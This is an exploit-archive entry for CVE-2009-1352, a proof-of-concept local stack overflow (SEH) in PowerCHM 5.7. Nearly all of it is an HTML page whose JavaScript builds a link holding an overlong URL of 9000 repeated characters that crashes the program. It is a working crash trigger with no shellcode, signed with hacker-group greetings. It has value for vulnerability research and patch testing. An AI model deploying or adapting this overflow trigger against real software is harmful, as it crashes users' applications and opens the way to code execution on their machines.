PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)

Related Vulnerabilities: CVE-2009-1352  
Publish Date: 14 Apr 2009
Author: SuB-ZeRo
                <html>
<body>
<br>
<font style="font-family:arial;font-size:24px">PowerCHM 5.7 (Long url) Local stack overflow (SEH) POC</font><br>
<font style="font-family:arial;font-size:19px">found By SuB-ZeRo (fbh@hotmail.com) thnaks to hisok4</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:12px">Greetz:All friends and muslims HackeRs secdz.com</font><br>
<br>

<script language="JavaScript">
var crash = "http://";

for (i=0;i<9000;i++) crash +="%41";

crash += "/test.rar"

document.write ('<a href="' + crash + '">B00M!</a>');

</script>
</body>
</html>

# milw0rm.com [2009-04-14]